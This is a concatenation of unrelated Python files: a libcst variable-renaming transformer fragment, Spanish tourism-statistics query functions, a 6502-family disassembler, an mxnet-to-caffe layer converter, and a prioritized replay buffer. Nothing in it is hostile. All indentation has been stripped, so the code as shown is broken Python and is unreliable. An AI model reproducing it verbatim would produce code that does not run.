# Exit early: No local Variables!
if len(seen_names) == 0:
self._worked = False
return cst_to_alter
to_replace = random.choice(seen_names)
if self.__string_randomness == "pseudo":
replacement = get_pseudo_random_string()
elif self.__string_randomness == "full":
replacement = get_random_string(5)
renamer = self.__Renamer(to_replace, replacement)
altered_cst = cst_to_alter.visit(renamer)
tries = tries + 1
except AttributeError:
# This case happened when the seen variables were tuples
# Seen in OpenVocabCodeNLM Test Data
tries = tries + 1
if tries == max_tries:
log.warning("Rename Variable Transformer failed after %i attempt",max_tries)
return altered_cst
def reset(self) -> None:
"""Resets the Transformer to be applied again.
after the reset all local state is deleted, the transformer is fully reset.
It holds:
> a = SomeTransformer()
> b = SomeTransformer()
> someTree.visit(a)
> a.reset()
> assert a == b
"""
self._worked = False
def worked(self) -> bool:
"""
Returns whether the transformer was successfully applied since the last reset.
If the transformer cannot be applied for logical reasons it will return false without attempts.
:returns bool
True if the Transformer was successfully applied.
False otherwise.
"""
return self._worked
def categories(self) -> [str]:
"""
Gives the categories specified for this transformer.
Used only for information and maybe later for filter purposes.
:return: The categories what this transformer can be summarized with.
"""
return ["Naming"]
def postprocessing(self) -> None:
"""
Manages all behavior after application, in case it worked(). Also calls reset().
"""
self.reset()
class __VariableCollector(cst.CSTVisitor):
"""
CSTVisitor that collects all variable-names in traversal.
Any seen value is saved in an attribute "seen_variables"
"""
def __init__(self):
self.seen_variables = []
finished = True
seen_variables = []
# "visit_Name" visits what we want in the end, but is too broad:
# The method class etc. also have names, but we only want assign ones
# If we go only for assigned ones, we do not change parameters / methods etc.
def visit_Assign_targets(self, node: "Assign") -> None:
"""
Adds the seen variables to the "seen_variables" attribute.
:param node: the node touched in traversal
:return: None
"""
# There are assigns with multiple targets, e.g. tuples or dicts.
# For now we focus on the simple cases
if len(node.targets) == 1:
self.seen_variables.append(node.targets[0])
return
# AnnAssign is for "Annotated Assign". It does not necessarily need a value assigned, you can
# Assign only types without values.
# See Libcst on this: https://libcst.readthedocs.io/en/latest/nodes.html?highlight=visit_Assign_Target#libcst.AnnAssign
def visit_AnnAssign_target(self, node: "AnnAssign") -> None:
"""
Adds the seen typed variables to the "seen_variables" attribute.
:param node: the node touched in traversal
:return: None
"""
self.seen_variables.append(node)
class __Renamer(cst.CSTTransformer):
"""
The CSTTransformer that traverses the CST and renames variables.
Currently does not care about the scoping - all occurrences will be renamed.
"""
def __init__(self, to_replace: str, replacement: str):
self.to_replace = to_replace
self.replacement = replacement
def leave_Name(
self, original_node: "Name", updated_node: "Name"
) -> "BaseExpression":
"""
Renames the variable if it was the one to be replaced.
What to replace and what to replace with are given in __init__.
Have a careful at the tests for this class to understand the behaviour.
:param original_node: the node before change
:param updated_node: the node after change
:return: the node after change, too.
"""
if original_node.value == self.to_replace:
return updated_node.with_changes(value=self.replacement)
return updated_node
|
from ..DB.Repositorio_Turistas_Entrantes_INE import RepositoryTuristasEntrantesINE as DBRepository
from ..Utilidades.Conversores import Conversores as Conversor
def obtener_porcentaje_turistas_entrantes_en_ciudad_destino_desde_ciudad_origen_en_rango_anio_mensualmente(CiudadDestino, CiudadOrigen, AnioInicio, AnioFin):
"""
Dado una ciudad y un año obtiene el porcentaje total de personas que llegan a esa ciudad de forma total
Dado una ciudad y un año obtiene el porcentaje total de personas que llegan a esa ciudad de forma total
:param Ciudad: Ciudad destino
:type Ciudad: str
:param Anio: Anio
:type Anio: int
:rtype: None
"""
conversor = Conversor()
repository = DBRepository()
cursor, labels = repository.ObtenerPorcentajeTuristasEntrantesEnCiudadDestinoDesdeCiudadOrigenEnRangoAniosMensualmente(CiudadDestino, CiudadOrigen, AnioInicio, AnioFin)
arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
##Mostrar JSON Extendido
matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
retval = conversor.ObtenerDataJSONExtendido(matriz)
return retval
def obtener_cantidad_total_turistas_entrantes_en_ciudad_anio(Ciudad, Anio):
"""
Dado una ciudad y un año obtiene la cantidad total de personas que llegan a esa ciudad de forma total
Dado una ciudad y un año obtiene la cantidad total de personas que llegan a esa ciudad de forma total
:param Ciudad: Ciudad destino
:type Ciudad: str
:param Anio: Anio
:type Anio: int
:rtype: None
"""
conversor = Conversor()
repository = DBRepository()
cursor, labels = repository.ObtenerNumeroTotalTuristasEntrantesEnCiudadEnAnio(Ciudad, Anio)
arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
##Mostrar JSON Extendido
matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
retval = conversor.ObtenerDataJSONExtendido(matriz)
return retval
def obtener_cantidad_turistas_entrantes_de_ciudad_origen_hacia_ciudad_destino_en_rango_anio_en_mes(CiudadDestino, CiudadOrigen, AnioInicio, AnioFin, Mes):
"""
Dado una ciudad y un año obtiene la cantidad total de personas que llegan de ciudad origen y van hacia ciudad destino de forma total durante esos años de forma anual durante ese mes
Dado una ciudad y un año obtiene la cantidad total de personas que llegan de ciudad origen y van hacia ciudad destino de forma total durante esos años de forma anual durante ese mes
:param CiudadDestino: Ciudad Destino
:type CiudadDestino: str
:param CiudadOrigen: Ciudad Origen
:type CiudadOrigen: str
:param AnioInicio: Anio Inicio
:type AnioInicio: int
:param AnioFin: Anio Fin
:type AnioFin: int
:param Mes: Mes
:type Mes: int
:rtype: None
"""
conversor = Conversor()
repository = DBRepository()
cursor, labels = repository.ObtenerNumeroTotalTuristasEntrantesEnCiudadDestinoDesdeCiudadOrigenEnRangoAniosEnMes(CiudadDestino, CiudadOrigen, AnioInicio, AnioFin, Mes)
arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
##Mostrar JSON Extendido
matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
retval = conversor.ObtenerDataJSONExtendido(matriz)
return retval
def obtener_cantidad_turistas_entrantes_en_ciudad_anio_mensualmente(Ciudad, Anio):
"""
Dado una ciudad y un año obtiene la cantidad total de personas que llegan a esa ciudad de forma total durante los meses de ese año
Dado una ciudad y un año obtiene la cantidad total de personas que llegan a esa ciudad de forma global durante los meses de ese año
:param Ciudad: Ciudad destino
:type Ciudad: str
:param Anio: Anio
:type Anio: int
:rtype: None
"""
conversor = Conversor()
repository = DBRepository()
cursor, labels = repository.ObtenerNumeroTotalTuristasEntrantesEnCiudadEnAnioMensualmente(Ciudad, Anio)
arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
##Mostrar JSON Extendido
matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
retval = conversor.ObtenerDataJSONExtendido(matriz)
return retval
def obtener_porcentaje_turistas_entrantes_en_ciudad_destino_desde_ciudad_origen_en_anio(CiudadDestino, CiudadOrigen, Anio):
"""
Dado una ciudad destino, una ciudad origen y un año obtiene el porcentaje total de personas que llegan a ciudad Destino desde ciudad origen durante ese año de forma anual
Dado una ciudad destino, una ciudad origen y un año obtiene el porcentaje total de personas que llegan a ciudad Destino desde ciudad origen durante ese año de forma anual
:param CiudadDestino: Ciudad Destino
:type CiudadDestino: str
:param CiudadOrigen: Ciudad Origen
:type CiudadOrigen: str
:param Anio: Anio
:type Anio: int
:rtype: None
"""
conversor = Conversor()
repository = DBRepository()
cursor, labels = repository.ObtenerPorcentajeTuristasEntrantesEnCiudadDestinoDesdeCiudadOrigenEnAnio(CiudadDestino, CiudadOrigen, Anio)
arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
##Mostrar JSON Extendido
matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
retval = conversor.ObtenerDataJSONExtendido(matriz)
return retval
def obtener_cantidad_turistas_entrantes_en_ciudad_destino_desde_ciudad_origen_en_rango_anio_en_mes(CiudadDestino, CiudadOrigen, AnioInicio, AnioFin, Mes):
"""
Dado una ciudad destino, una ciudad origen, un mes y un año obtiene la cantidad total de personas que salen de ciudad origen y van hacia ciudad destino de forma total durante esos años de forma anual durante ese mes
Dado una ciudad destino, una ciudad origen, un mes y un año obtiene la cantidad total de personas que salen de ciudad origen y van hacia ciudad destino de forma total durante esos años de forma anual durante ese mes
:param CiudadDestino: Ciudad Destino
:type CiudadDestino: str
:param CiudadOrigen: Ciudad Origen
:type CiudadOrigen: str
:param AnioInicio: Anio Inicio
:type AnioInicio: int
:param AnioFin: Anio Fin
:type AnioFin: int
:param Mes: Mes
:type Mes: int
:rtype: None
"""
conversor = Conversor()
repository = DBRepository()
cursor, labels = repository.ObtenerNumeroTotalTuristasEntrantesEnCiudadDestinoDesdeCiudadOrigenEnRangoAniosEnMes(CiudadDestino, CiudadOrigen, AnioInicio, AnioFin, Mes)
arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
##Mostrar JSON Extendido
matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
retval = conversor.ObtenerDataJSONExtendido(matriz)
return retval
def obtener_porcentaje_turistas_entrantes_en_ciudad_destino_desde_ciudad_origen_en_rango_anios(CiudadDestino, CiudadOrigen, AnioInicio, AnioFin):
"""
Dado una ciudad destino, una ciudad origen y un rango de años obtiene la cantidad total de personas que llegan a ciudad destino desde ciudad origen durante esos años de forma anual
Dado una ciudad destino, una ciudad origen y un rango de años obtiene la cantidad total de personas que llegan a ciudad destino desde ciudad origen durante esos años de forma anual
:param CiudadDestino: Ciudad Destino
:type CiudadDestino: str
:param CiudadOrigen: Ciudad Origen
:type CiudadOrigen: str
:param AnioInicio: Anio Inicio
:type AnioInicio: int
:param AnioFin: Anio Fin
:type AnioFin: int
:rtype: None
"""
conversor = Conversor()
repository = DBRepository()
cursor, labels = repository.ObtenerPorcentajeTotalTuristasEntrantesEnCiudadDestinoDesdeCiudadOrigenEnRangoAnios(CiudadDestino, CiudadOrigen, AnioInicio, AnioFin)
arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
##Mostrar JSON Extendido
matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
retval = conversor.ObtenerDataJSONExtendido(matriz)
return retval
def obtener_cantidad_turistas_entrantes_en_ciudad_rango_anios(Ciudad, AnioInicio, AnioFin):
"""
Dado una ciudad y un rango de años obtiene la cantidad total de personas que llegan a esa ciudad de forma total durante esos años
Dado una ciudad y un rango de años obtiene la cantidad total de personas que llegan a esa ciudad de forma total durante esos años
:param Ciudad: Ciudad destino
:type Ciudad: str
:param AnioInicio: Anio Inicio
:type AnioInicio: int
:param AnioFin: Anio Fin
:type AnioFin: int
:rtype: None
"""
conversor = Conversor()
repository = DBRepository()
cursor, labels = repository.ObtenerNumeroTotalTuristasEntrantesEnCiudadEnRangoAnios(Ciudad, AnioInicio, AnioFin)
arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
##Mostrar JSON Extendido
matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
retval = conversor.ObtenerDataJSONExtendido(matriz)
return retval
def obtener_cantidad_turistas_entrantes_en_ciudad_rango_anios_en_mes(Ciudad, AnioInicio, AnioFin, Mes):
"""
Dado una ciudad, un rango de años y un mes obtiene la cantidad total de personas que llegan a esa ciudad de forma total durante esos años durante ese mes
Dado una ciudad, un rango de años y un mes obtiene la cantidad total de personas que llegan a esa ciudad de forma total durante esos años durante ese mes
:param Ciudad: Ciudad destino
:type Ciudad: str
:param AnioInicio: Anio Inicio
:type AnioInicio: int
:param AnioFin: Anio Fin
:type AnioFin: int
:param Mes: Mes
:type Mes: str
:rtype: None
"""
conversor = Conversor()
repository = DBRepository()
cursor, labels = repository.ObtenerNumeroTotalTuristasEntrantesEnCiudadEnRangoAniosEnMes(Ciudad, AnioInicio, AnioFin, Mes)
arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
##Mostrar JSON Extendido
matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
retval = conversor.ObtenerDataJSONExtendido(matriz)
return retval
def obtener_cantidad_turistas_entrantes_en_ciudad_rango_anios_mensualmente(Ciudad, AnioInicio, AnioFin):
"""
Dado una ciudad, un rango de años y un mes obtiene la cantidad total de personas que llegan a esa ciudad de forma total durante esos años separados por meses
Dado una ciudad, un rango de años y un mes obtiene la cantidad total de personas que llegan a esa ciudad de forma total durante esos años separados por meses
:param Ciudad: Ciudad destino
:type Ciudad: str
:param AnioInicio: Anio Inicio
:type AnioInicio: int
:param AnioFin: Anio Fin
:type AnioFin: int
:param Mes: Mes
:type Mes: str
:rtype: None
"""
conversor = Conversor()
repository = DBRepository()
cursor, labels = repository.ObtenerNumeroTotalTuristasEntrantesEnCiudadEnRangoAniosMensualmente(Ciudad, AnioInicio, AnioFin)
arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
##Mostrar JSON Extendido
matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
retval = conversor.ObtenerDataJSONExtendido(matriz)
return retval
|
<filename>py65/disassemblerM65C02A.py
from utils.addressing import AddressParser
class Disassembler:
def __init__(self, mpu, address_parser=None):
if address_parser is None:
address_parser = AddressParser()
self._mpu = mpu
self._address_parser = address_parser
self.addrWidth = mpu.ADDR_WIDTH
self.byteWidth = mpu.BYTE_WIDTH
if mpu.BYTE_WIDTH == 8:
self.wordWidth = 16
else:
self.wordWidth = 32
self.addrFmt = mpu.ADDR_FORMAT
self.byteFmt = mpu.BYTE_FORMAT
if mpu.BYTE_WIDTH == 8:
self.wordFmt = '%04X'
else:
self.wordFmt = '%08X'
self.addrMask = (1 << self.addrWidth) - 1
self.byteMask = (1 << self.byteWidth) - 1
self.wordMask = (1 << self.wordWidth) - 1
def instruction_at(self, pc):
""" Disassemble the instruction at PC and return a tuple
containing (instruction byte count, human readable text)
"""
instruction = self._mpu.rdDM(pc)
disasm, addressing = self._mpu.disassemble[instruction]
if addressing == 'acc':
disasm += ' A'
length = 1
elif addressing == 'imp':
length = 1
elif addressing == 'imm':
byte = self._mpu.rdDM(pc + 1)
disasm += ' #$' + self.byteFmt % byte
length = 2
elif addressing == 'zp':
zp_address = self._mpu.rdDM(pc + 1)
address_or_label = self._address_parser.label_for(
zp_address, '$' + self.byteFmt % zp_address)
disasm += ' %s' % address_or_label
length = 2
elif addressing == 'zpX':
zp_address = self._mpu.rdDM(pc + 1)
address_or_label = self._address_parser.label_for(
zp_address, '$' + self.byteFmt % zp_address)
disasm += ' %s,X' % address_or_label
length = 2
elif addressing == 'zpY':
zp_address = self._mpu.rdDM(pc + 1)
address_or_label = self._address_parser.label_for(
zp_address, '$' + self.byteFmt % zp_address)
disasm += ' %s,Y' % address_or_label
length = 2
elif addressing == 'zpI':
zp_address = self._mpu.rdDM(pc + 1)
address_or_label = self._address_parser.label_for(
zp_address, '($' + self.byteFmt % zp_address + ')')
disasm += ' %s' % address_or_label
length = 2
elif addressing == 'zpIY':
zp_address = self._mpu.rdDM(pc + 1)
address_or_label = self._address_parser.label_for(
zp_address, '$' + self.byteFmt % zp_address)
disasm += ' (%s),Y' % address_or_label
length = 2
elif addressing == 'zpXI':
zp_address = self._mpu.rdDM(pc + 1)
address_or_label = self._address_parser.label_for(
zp_address, '$' + self.byteFmt % zp_address)
disasm += ' (%s,X)' % address_or_label
length = 2
elif addressing == 'abs':
address = self._mpu.WordAt(pc + 1)
address_or_label = self._address_parser.label_for(
address, '$' + self.addrFmt % address)
disasm += ' ' + address_or_label
length = 3
elif addressing == 'absX':
address = self._mpu.WordAt(pc + 1)
address_or_label = self._address_parser.label_for(
address, '$' + self.addrFmt % address)
disasm += ' %s,X' % address_or_label
length = 3
elif addressing == 'absY':
address = self._mpu.WordAt(pc + 1)
address_or_label = self._address_parser.label_for(
address, '$' + self.addrFmt % address)
disasm += ' %s,Y' % address_or_label
length = 3
elif addressing == 'absI':
address = self._mpu.WordAt(pc + 1)
address_or_label = self._address_parser.label_for(
address, '$' + self.addrFmt % address)
disasm += ' (%s)' % address_or_label
length = 3
elif addressing == 'absXI':
address = self._mpu.WordAt(pc + 1)
address_or_label = self._address_parser.label_for(
address, '$' + self.addrFmt % address)
disasm += ' (%s,X)' % address_or_label
length = 3
elif addressing == 'rel':
opv = self._mpu.rdDM(pc + 1)
targ = pc + 2
if opv & (1 << (self.byteWidth - 1)):
targ -= (opv ^ self.byteMask) + 1
else:
targ += opv
targ &= self.addrMask
address_or_label = self._address_parser.label_for(
targ, '$' + self.addrFmt % targ)
disasm += ' ' + address_or_label
length = 2
elif addressing == 'zprel':
print(' --- zprel: ', end='')
zp_address = self._mpu.rdDM(pc + 1)
address_or_label = self._address_parser.label_for(
zp_address, '$' + self.byteFmt % zp_address)
disasm += ' %s' % address_or_label
opv = self._mpu.rdDM(pc + 2)
targ = pc + 3
if opv & (1 << (self.byteWidth - 1)):
targ -= (opv ^ self.byteMask) + 1
else:
targ += opv
targ &= self.addrMask
address_or_label = self._address_parser.label_for(
targ, '$' + self.addrFmt % targ)
disasm += ',' + address_or_label
length = 3
elif addressing == 'rel16':
opv = self._mpu.WordAt(pc + 1)
targ = pc + 3
if opv & (1 << (self.wordWidth - 1)):
targ -= (opv ^ self.wordMask) + 1
else:
targ += opv
targ &= self.addrMask
address_or_label = self._address_parser.label_for(
targ, '$' + self.addrFmt % targ)
disasm += ' ' + address_or_label
length = 3
elif addressing == 'ipp':
zp_address = self._mpu.rdDM(pc + 1)
address_or_label = self._address_parser.label_for(
zp_address, '$' + self.byteFmt % zp_address)
disasm += ' %s,I' % address_or_label
length = 2
return (length, disasm)
|
# Copyright 2018 Argo AI, LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Generate caffe layer according to mxnet config.
"""
import constants
from ast import literal_eval
from caffe import layers
from caffe import params
def make_list(str_inp):
"""Create a list from a string of numbers.
Args:
str_inp (str): Expression to convert to list
Returns:
list: Converted list
"""
val = literal_eval(str_inp)
if type(val) is not tuple:
val = [val]
return list(val)
def get_caffe_layer(node, net, input_dims):
"""Generate caffe layer for corresponding mxnet op.
Args:
node (iterable from MxnetParser): Mxnet op summary generated by MxnetParser
net (caffe.net): Caffe netspec object
Returns:
caffe.layers: Equivalent caffe layer
"""
if node['type'] == 'Convolution':
assert len(node['inputs']) == 1, \
'Convolution layers can have only one input'
conv_params = node['attr']
kernel_size = make_list(conv_params['kernel'])
num_filters = make_list(conv_params['num_filter'])[0]
if 'stride' in conv_params:
stride = make_list(conv_params['stride'])[0]
else:
stride = 1
padding = make_list(conv_params['pad'])
if 'dilate' in conv_params:
dilation = make_list(conv_params['dilate'])[0]
else:
dilation = 1
convolution_param = {'pad': padding,
'kernel_size': kernel_size,
'num_output': num_filters,
'stride': stride,
'dilation': dilation}
return layers.Convolution(net[node['inputs'][0]],
convolution_param=convolution_param)
if node['type'] == 'Activation':
assert len(node['inputs']) == 1, \
'Activation layers can have only one input'
assert node['attr']['act_type'] == 'relu'
return layers.ReLU(net[node['inputs'][0]])
if node['type'] == 'Pooling':
assert len(node['inputs']) == 1, \
'Pooling layers can have only one input'
kernel_size = make_list(node['attr']['kernel'])
stride = make_list(node['attr']['stride'])
pooling_type = node['attr']['pool_type']
if 'pad' in node['attr']:
padding = make_list(node['attr']['pad'])
else:
padding = [0]
if pooling_type == 'max':
pooling = params.Pooling.MAX
elif pooling_type == 'avg':
pooling = params.Pooling.AVG
pooling_param = {'pool': pooling, 'pad': padding[0],
'kernel_size': kernel_size[0], 'stride': stride[0]}
return layers.Pooling(net[node['inputs'][0]],
pooling_param=pooling_param)
if node['type'] == 'L2Normalization':
across_spatial = node['attr']['mode'] != 'channel'
channel_shared = False
scale_filler = {
'type': "constant",
'value': constants.NORMALIZATION_FACTOR
}
norm_param = {'across_spatial': across_spatial,
'scale_filler': scale_filler,
'channel_shared': channel_shared}
return layers.Normalize(net[node['inputs'][0]],
norm_param=norm_param)
# Note - this layer has been implemented
# only in WeiLiu's ssd branch of caffe not in caffe master
if node['type'] == 'transpose':
order = make_list(node['attr']['axes'])
return layers.Permute(net[node['inputs'][0]],
permute_param={'order': order})
if node['type'] == 'Flatten':
if node['inputs'][0].endswith('anchors'):
axis = 2
else:
axis = 1
return layers.Flatten(net[node['inputs'][0]],
flatten_param={'axis': axis})
if node['type'] == 'Concat':
# In the ssd model, always concatenate along last axis,
# since anchor boxes have an extra dimension in caffe (that includes variance).
axis = -1
concat_inputs = [net[inp] for inp in node['inputs']]
return layers.Concat(*concat_inputs, concat_param={'axis': axis})
if node['type'] == 'Reshape':
if node['name'] == 'multibox_anchors':
reshape_dims = [1, 2, -1]
else:
reshape_dims = make_list(node['attr']['shape'])
return layers.Reshape(net[node['inputs'][0]],
reshape_param={'shape': {'dim': reshape_dims}})
if node['type'] == '_contrib_MultiBoxPrior':
priorbox_inputs = [net[inp] for inp in node['inputs']] + [net["data"]]
sizes = make_list(node["attr"]["sizes"])
min_size = sizes[0] * input_dims[0]
max_size = int(round((sizes[1] * input_dims[0]) ** 2 / min_size))
aspect_ratio = make_list(node["attr"]["ratios"])
steps = make_list(node["attr"]["steps"])
param = {'clip': node["attr"]["clip"] == "true",
'flip': False,
'min_size': min_size,
'max_size': max_size,
'aspect_ratio': aspect_ratio,
'variance': [0.1, 0.1, 0.2, 0.2],
'step': int(round(steps[0] * input_dims[0])),
}
return layers.PriorBox(*priorbox_inputs, prior_box_param=param)
if node['type'] == '_contrib_MultiBoxDetection':
multibox_inputs = [net[inp] for inp in node['inputs']]
bottom_order = [1, 0, 2]
multibox_inputs = [multibox_inputs[i] for i in bottom_order]
param = {
'num_classes': constants.NUM_CLASSES,
'share_location': True,
'background_label_id': 0,
'nms_param': {
'nms_threshold': float(node['attr']['nms_threshold']),
'top_k': int(node['attr']['nms_topk'])
},
'keep_top_k': make_list(node['attr']['nms_topk'])[0],
'confidence_threshold': 0.01,
'code_type': params.PriorBox.CENTER_SIZE,
}
return layers.DetectionOutput(*multibox_inputs, detection_output_param=param)
if node['type'] in ['SoftmaxActivation', 'SoftmaxOutput']:
if 'mode' not in node['attr']:
axis = 1
elif node['attr']['mode'] == 'channel':
axis = 1
else:
axis = 0
# note: caffe expects confidence scores to be flattened before detection output layer receives it
return layers.Flatten(layers.Permute(layers.Softmax(net[node['inputs'][0]],
axis=axis),
permute_param={'order': [0, 2, 1]}),
flatten_param={'axis': 1})
|
<gh_stars>1-10
import numpy as np
import random
import torch
from collections import namedtuple, deque
import math
#code from openai
#https://github.com/openai/baselines/blob/master/baselines/deepq/replay_buffer.py
import operator
class SegmentTree(object):
def __init__(self, capacity, operation, neutral_element):
"""Build a Segment Tree data structure.
https://en.wikipedia.org/wiki/Segment_tree
Can be used as regular array, but with two
important differences:
a) setting item's value is slightly slower.
It is O(lg capacity) instead of O(1).
b) user has access to an efficient `reduce`
operation which reduces `operation` over
a contiguous subsequence of items in the
array.
Paramters
---------
capacity: int
Total size of the array - must be a power of two.
operation: lambda obj, obj -> obj
and operation for combining elements (eg. sum, max)
must for a mathematical group together with the set of
possible values for array elements.
neutral_element: obj
neutral element for the operation above. eg. float('-inf')
for max and 0 for sum.
"""
assert capacity > 0 and capacity & (capacity - 1) == 0, "capacity must be positive and a power of 2."
self._capacity = capacity
self._value = [neutral_element for _ in range(2 * capacity)]
self._operation = operation
def _reduce_helper(self, start, end, node, node_start, node_end):
if start == node_start and end == node_end:
return self._value[node]
mid = (node_start + node_end) // 2
if end <= mid:
return self._reduce_helper(start, end, 2 * node, node_start, mid)
else:
if mid + 1 <= start:
return self._reduce_helper(start, end, 2 * node + 1, mid + 1, node_end)
else:
return self._operation(
self._reduce_helper(start, mid, 2 * node, node_start, mid),
self._reduce_helper(mid + 1, end, 2 * node + 1, mid + 1, node_end)
)
def reduce(self, start=0, end=None):
"""Returns result of applying `self.operation`
to a contiguous subsequence of the array.
self.operation(arr[start], operation(arr[start+1], operation(... arr[end])))
Parameters
----------
start: int
beginning of the subsequence
end: int
end of the subsequences
Returns
-------
reduced: obj
result of reducing self.operation over the specified range of array elements.
"""
if end is None:
end = self._capacity
if end < 0:
end += self._capacity
end -= 1
return self._reduce_helper(start, end, 1, 0, self._capacity - 1)
def __setitem__(self, idx, val):
# index of the leaf
idx += self._capacity
self._value[idx] = val
idx //= 2
while idx >= 1:
self._value[idx] = self._operation(
self._value[2 * idx],
self._value[2 * idx + 1]
)
idx //= 2
def __getitem__(self, idx):
assert 0 <= idx < self._capacity
return self._value[self._capacity + idx]
class SumSegmentTree(SegmentTree):
def __init__(self, capacity):
super(SumSegmentTree, self).__init__(
capacity=capacity,
operation=operator.add,
neutral_element=0.0
)
def sum(self, start=0, end=None):
"""Returns arr[start] + ... + arr[end]"""
return super(SumSegmentTree, self).reduce(start, end)
def find_prefixsum_idx(self, prefixsum):
"""Find the highest index `i` in the array such that
sum(arr[0] + arr[1] + ... + arr[i - i]) <= prefixsum
if array values are probabilities, this function
allows to sample indexes according to the discrete
probability efficiently.
Parameters
----------
perfixsum: float
upperbound on the sum of array prefix
Returns
-------
idx: int
highest index satisfying the prefixsum constraint
"""
assert 0 <= prefixsum <= self.sum() + 1e-5
idx = 1
while idx < self._capacity: # while non-leaf
if self._value[2 * idx] > prefixsum:
idx = 2 * idx
else:
prefixsum -= self._value[2 * idx]
idx = 2 * idx + 1
return idx - self._capacity
class MinSegmentTree(SegmentTree):
def __init__(self, capacity):
super(MinSegmentTree, self).__init__(
capacity=capacity,
operation=min,
neutral_element=float('inf')
)
def min(self, start=0, end=None):
"""Returns min(arr[start], ..., arr[end])"""
return super(MinSegmentTree, self).reduce(start, end)
class ReplayBuffer(object):
def __init__(self, size):
"""Create Replay buffer.
Parameters
----------
size: int
Max number of transitions to store in the buffer. When the buffer
overflows the old memories are dropped.
"""
self._storage = []
self._maxsize = size
self._next_idx = 0
def __len__(self):
return len(self._storage)
def push(self, state, action, reward, next_state, done):
data = (state, action, reward, next_state, done)
if self._next_idx >= len(self._storage):
self._storage.append(data)
else:
self._storage[self._next_idx] = data
self._next_idx = (self._next_idx + 1) % self._maxsize
def _encode_sample(self, idxes):
obses_t, actions, rewards, obses_tp1, dones = [], [], [], [], []
for i in idxes:
data = self._storage[i]
obs_t, action, reward, obs_tp1, done = data
obses_t.append(np.array(obs_t, copy=False))
actions.append(np.array(action, copy=False))
rewards.append(reward)
obses_tp1.append(np.array(obs_tp1, copy=False))
dones.append(done)
return np.array(obses_t), np.array(actions), np.array(rewards), np.array(obses_tp1), np.array(dones)
def sample(self, batch_size):
"""Sample a batch of experiences.
Parameters
----------
batch_size: int
How many transitions to sample.
Returns
-------
obs_batch: np.array
batch of observations
act_batch: np.array
batch of actions executed given obs_batch
rew_batch: np.array
rewards received as results of executing act_batch
next_obs_batch: np.array
next set of observations seen after executing act_batch
done_mask: np.array
done_mask[i] = 1 if executing act_batch[i] resulted in
the end of an episode and 0 otherwise.
"""
idxes = [random.randint(0, len(self._storage) - 1) for _ in range(batch_size)]
return self._encode_sample(idxes)
class PrioritizedReplayBuffer(ReplayBuffer):
def __init__(self, size, alpha):
"""Create Prioritized Replay buffer.
Parameters
----------
size: int
Max number of transitions to store in the buffer. When the buffer
overflows the old memories are dropped.
alpha: float
how much prioritization is used
(0 - no prioritization, 1 - full prioritization)
See Also
--------
ReplayBuffer.__init__
"""
super(PrioritizedReplayBuffer, self).__init__(size)
assert alpha > 0
self._alpha = alpha
it_capacity = 1
while it_capacity < size:
it_capacity *= 2
self._it_sum = SumSegmentTree(it_capacity)
self._it_min = MinSegmentTree(it_capacity)
self._max_priority = 1.0
def push(self, *args, **kwargs):
"""See ReplayBuffer.store_effect"""
idx = self._next_idx
super(PrioritizedReplayBuffer, self).push(*args, **kwargs)
self._it_sum[idx] = self._max_priority ** self._alpha
self._it_min[idx] = self._max_priority ** self._alpha
def _sample_proportional(self, batch_size):
res = []
for _ in range(batch_size):
# TODO(szymon): should we ensure no repeats?
mass = random.random() * self._it_sum.sum(0, len(self._storage) - 1)
idx = self._it_sum.find_prefixsum_idx(mass)
res.append(idx)
return res
def sample(self, batch_size, beta):
"""Sample a batch of experiences.
compared to ReplayBuffer.sample
it also returns importance weights and idxes
of sampled experiences.
Parameters
----------
batch_size: int
How many transitions to sample.
beta: float
To what degree to use importance weights
(0 - no corrections, 1 - full correction)
Returns
-------
obs_batch: np.array
batch of observations
act_batch: np.array
batch of actions executed given obs_batch
rew_batch: np.array
rewards received as results of executing act_batch
next_obs_batch: np.array
next set of observations seen after executing act_batch
done_mask: np.array
done_mask[i] = 1 if executing act_batch[i] resulted in
the end of an episode and 0 otherwise.
weights: np.array
Array of shape (batch_size,) and dtype np.float32
denoting importance weight of each sampled transition
idxes: np.array
Array of shape (batch_size,) and dtype np.int32
idexes in buffer of sampled experiences
"""
assert beta > 0
idxes = self._sample_proportional(batch_size)
weights = []
p_min = self._it_min.min() / self._it_sum.sum()
max_weight = (p_min * len(self._storage)) ** (-beta)
for idx in idxes:
p_sample = self._it_sum[idx] / self._it_sum.sum()
weight = (p_sample * len(self._storage)) ** (-beta)
weights.append(weight / max_weight)
weights = np.array(weights)
encoded_sample = self._encode_sample(idxes)
return tuple(list(encoded_sample) + [weights, idxes])
def update_priorities(self, idxes, priorities):
"""Update priorities of sampled transitions.
sets priority of transition at index idxes[i] in buffer
to priorities[i].
Parameters
----------
idxes: [int]
List of idxes of sampled transitions
priorities: [float]
List of updated priorities corresponding to
transitions at the sampled idxes denoted by
variable `idxes`.
"""
assert len(idxes) == len(priorities)
for idx, priority in zip(idxes, priorities):
assert priority > 0
assert 0 <= idx < len(self._storage)
self._it_sum[idx] = priority ** self._alpha
